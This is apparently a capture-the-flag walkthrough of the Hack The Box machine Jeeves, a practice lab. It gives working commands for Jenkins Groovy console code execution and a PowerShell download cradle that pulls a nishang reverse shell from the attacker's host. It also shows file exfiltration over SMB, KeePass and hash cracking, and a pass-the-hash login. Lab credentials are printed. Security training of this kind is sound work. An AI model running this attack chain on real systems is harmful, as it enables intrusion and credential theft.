Jeeves HTB
IP
10.10.10.63initial Nmap scan
sudo nmap -sV -sC -A -oA inital_nmap 10.10.10.63Full Nmap scan
nmap -p- -sV -oA nmap_full 10.10.10.63Nothing to interesting
While we wait for the full scan to complete, we'll work off the initial scan
Ports open
80: HTTP Microsoft IIS 10.0
135: RPC
445: SMB
5000: HTTP Jetty(9.4.z-SNAPSHOT)
SMB
checking if SMB has anonymous authentication
crackmapexec smb 10.10.10.63 -p anonymous -u anonymous --sharesit does not
Port 80 HTTP
the first thing we see is some kind of search engine
Lets do some dir busting and see if we can discover anything interesting
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.63 -x asp -o dirs.txtwe dont find anything interesting
catching a request with burp shows nothing interesting we are redirected to a /error.html
But we do see the following
this doesn't seem right, could be a rabbit hole
port 50000 HTTP
When we navigate to port 50000 we can see the following
Not a lot going on here lets perform some directory busting and see if we can find anything interesting
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.63:50000 -x asp -o dirs.txtwe do find an interesting directory
http://10.10.10.63:50000/askjeeves/
Looks like we Jenkins running on the server
Jenkins
What is jenkins
an open-source continuous integration/continuous delivery and deployment (CI/CD) automation software DevOps tool is written in java
from the initial home page, we can see the version
Jenkins ver: 2.87
if we refer to
we can see this version of Jenkins, we can take advantage of the script console and groovy to generate a reverse shell onto the target machine
Let's just confirm this and see if we can execute cmd.exe
cmd = """ cmd.exe /c echo "hello there" """
println cmd.execute().text
as we can see we have code execution on the system
First lets prepare our reverse shell
well use the nishang repo
git clone https://github.com/samratashok/nishang.gitcopy the
Invoke-PowerShellTcp.ps1into our working directory (or where you will transfer from)
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./Within the
Invoke-PowerShellTcp.ps1we want to edit the script
vi Invoke-PowerShellTcp.ps1
Notice at the bottom of the script we added the actual command to execute it with the IP and port we wish to connect from, this little command will execute first giving our script our IP address and Port number to establish the connection
Let's start up our python server read to transfer the file and execute it
python3 -m http.server 9010Start our netcat listener
nc -lvnp 9001Now lets pickup our Powershell script and execute it, in the script console
cmd = """ powershell "IEX(New-Object Net.WebClient).downloadstring('http://10.10.16.8:9010/Invoke-PowerShellTcp.ps1')" """
println cmd.execute().text
Once we run the console we can see we have a shell on the system
Privilege escalation via kohsuke
Alright let's get some information about the system
systeminfo
Host Name: JEEVES
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.10586 N/A Build 10586
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00331-20304-47406-AA297
Original Install Date: 10/25/2017, 4:45:33 PM
System Boot Time: 8/10/2023, 5:23:46 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2645 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 917 MB
Virtual Memory: Max Size: 2,687 MB
Virtual Memory: Available: 1,528 MB
Virtual Memory: In Use: 1,159 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 10 Hotfix(s) Installed.
[01]: KB3150513
[02]: KB3161102
[03]: KB3172729
[04]: KB3173428
[05]: KB4021702
[06]: KB4022633
[07]: KB4033631
[08]: KB4035632
[09]: KB4051613
[10]: KB4041689
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.63
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.well copy and paste this into systeminfo.txt and run wes-ng against it and see if we can find priv esc exploit
first let's update wes
python3 /opt/wesng/wes.py --updateNow let's run it against systeminfo.txt
python3 /opt/wesng/wes.py systeminfo.txt > possible_cveswe do have a number of exploits we could possibly use but will keep this in our back pocket
Let's see what other users are on the machine
net user
Nothing too interesting here
user privileges
whoami /priv
possible rotten potato attack, again back pocket
Within the C:\Users\Administrator.jenkins we do find secret.key
58d05496da2496d09036d36c99b56f1e89cc662f3e65a4023de71de7e1df8afbRunning the hash through hash-identifier we can see it is most likely a sha-256 hash, lets try and crack it
hashcat -m 1470 -a 0 secret_key_hash.txt /usr/share/wordlists/rockyou.txthmm can't crack it
within the C:\Users\Administrator.jenkins\users\admin we do find a config.xml file which contains
API token
<apiToken>{AQAAABAAAAAwID3cR3pyZaEkaDPU25Z0S+nrU8+gDgB0JEWORJ5L1P2T+zXc/tSs2IVn1ugWLaui54D6yYki4vhXQtGhqUSeFw=and a password hash
<passwordHash>#jbcrypt:$2a$10$QyIjgAFa7r3x8IMyqkeCluCB7ddvbR7wUn1GmFJNO2jQp2k8roehO</passwordHash>Let's see if we can crack it
hashcat -m 3200 -a 0 hash_config_file.txt /usr/share/wordlists/rockyou.txtWhile we wait for the hash lets keep hunting around
Managed to escalate privileges for the hash cracked
In C:\Users\kohsuke\Documents we do find a keepass file, this is interesting let's download this onto our local machine
to download the file to our local machine
Let's set up an SMB server on our local machine
impacket-smbserver -smb2support connectToMe ./Target machine
cp CEH.kdbx //10.10.16.8/connectToMe/CEH.kdbx
Now we have the CEH.kdbx file on our local machine
we can download the keepass password manager onto our local machine
sudo apt-get install keepass2When we try to open the CEH.kdbx file, we are prompted for a master password
keepass2 CEH.kdbx
what we can do is use keepass2john to convert the KeePass database files into a format that can be cracked with John
keepass2john CEH.kdbx > hash.txt
Now we can run john against our new hash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txtwe have the password
moonshine1
Lets open our kdbx file again
keepass2 CEH.kdbxenter the password
passwords
Walmart.com: anonymous: Password
Bank of America: Michael321: 12345
it's a secret: admin: F7WhTrSFDKB6sxHU1cUn
EC-Council: hackerman123: pwndyouall!
Keys to the kingdom: bob: lCEUnYPjNfIuPZSzOySA
DC Recovery PW: administrator: S1TjAtJHKsugh9oC4VZl
Jenkins admin: admin:
Backup stuff: ?: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00Looks like we have an NTLM hash for Backup stuff
and a domain/username
what we can do is utilise the pth-winexe to perform a pass-the-hash attack gaining a shell on the system
pth-winexe -U jenkins/administrator //10.10.10.63 cmd.exethen we can pass the Backup stuff hash, as this seems to be the only hash in the password database
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00we have successfully passed the hash using the administrator NTLM hash
Reading the Flag
Notice the C:\Users\Administrator\Desktop we can't seem to find the root.txt flag
this is because the hm.txt is an NTF attribute that supports various attributes including a Hidden attribute meaning you can hide another file within another so essentially this hm.txt acts like a folder as it does as a file but if
dir /rWe can view alternative data streams revelling the hidden file
and to read the contents of the file we can use PowerShell for this
powershell (Get-Content hm.txt -Stream root.txt)Last updated